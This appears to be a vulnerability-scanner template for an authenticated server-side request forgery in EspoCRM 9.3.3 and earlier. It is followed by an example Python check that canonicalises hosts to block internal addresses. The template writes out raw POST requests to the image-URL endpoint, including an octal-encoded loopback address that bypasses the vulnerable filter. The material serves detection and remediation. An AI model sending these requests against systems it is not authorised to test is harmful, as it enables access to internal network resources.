id: CVE-2026-33534

info:
  name: EspoCRM - Server-Side Request Forgery
  author: EntroVyx
  severity: medium
  description: |
    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation in HostCheck::isNotInternalHost(), which can be bypassed with alternative IPv4 formats, letting authenticated users reach internal resources via the /api/v1/Attachment/fromImageUrl endpoint.
  impact: |
    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
  remediation: |
    Upgrade to version 9.3.4 or later.
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-33534
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: espocrm
    product: espocrm
  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive

flow: http(1) && http(2)

http:
  # Request 1: the canonical loopback literal must be rejected (403) by the
  # internal-host check; the result is used only as a precondition (internal).
  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
        internal: true

  # Request 2: the same loopback address written in octal notation passes the
  # check on vulnerable versions and the attachment is created (200).
  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json
        Accept: application/json

        {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
        condition: and
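The root cause the template probes is an internal-host check that compares the textual host rather than the address a client would actually connect to. The following is an added example, not EspoCRM's code, of a check that canonicalises the host first; it goes beyond the page in that it also normalises hex, short dotted and plain-integer IPv4 spellings (everything libc inet_aton accepts) and IPv4-mapped IPv6 literals, and fails closed when the host cannot be resolved.

```python
import ipaddress
import socket


def _unwrap(ip):
    """Return the IPv4 address behind an IPv4-mapped IPv6 literal (::ffff:a.b.c.d)."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        return ip.ipv4_mapped
    return ip


def canonical_addresses(host: str):
    """Resolve a URL host to the list of IP addresses a client would connect to."""
    host = host.strip("[]")  # bracketed IPv6 literal, e.g. "[::1]"
    try:
        # inet_aton applies the permissive libc rules, so "0177.0.0.1" (the
        # octal form used in the template above), "0x7f.0.0.1", "127.1" and
        # "2130706433" all canonicalise to 127.0.0.1.
        return [ipaddress.IPv4Address(socket.inet_aton(host))]
    except OSError:
        pass
    try:
        return [_unwrap(ipaddress.ip_address(host))]  # plain IPv6 literal
    except ValueError:
        pass
    try:
        # Hostname: collect every record, since the client may pick any of them.
        infos = socket.getaddrinfo(host, None)
    except OSError:
        return []
    return sorted({_unwrap(ipaddress.ip_address(info[4][0])) for info in infos}, key=str)


def is_internal_host(host: str) -> bool:
    """True if the host is unresolvable or any of its addresses is not globally routable.

    is_global is False for loopback, RFC 1918, link-local (169.254/16, which
    includes the cloud metadata address), CGNAT, unspecified and reserved ranges.
    """
    addrs = canonical_addresses(host)
    if not addrs:
        return True  # fail closed on resolution failure
    return any(not addr.is_global for addr in addrs)
```

A check like this is only sufficient if the fetch then connects to the vetted address (rather than re-resolving the hostname) and re-runs the check on every redirect target.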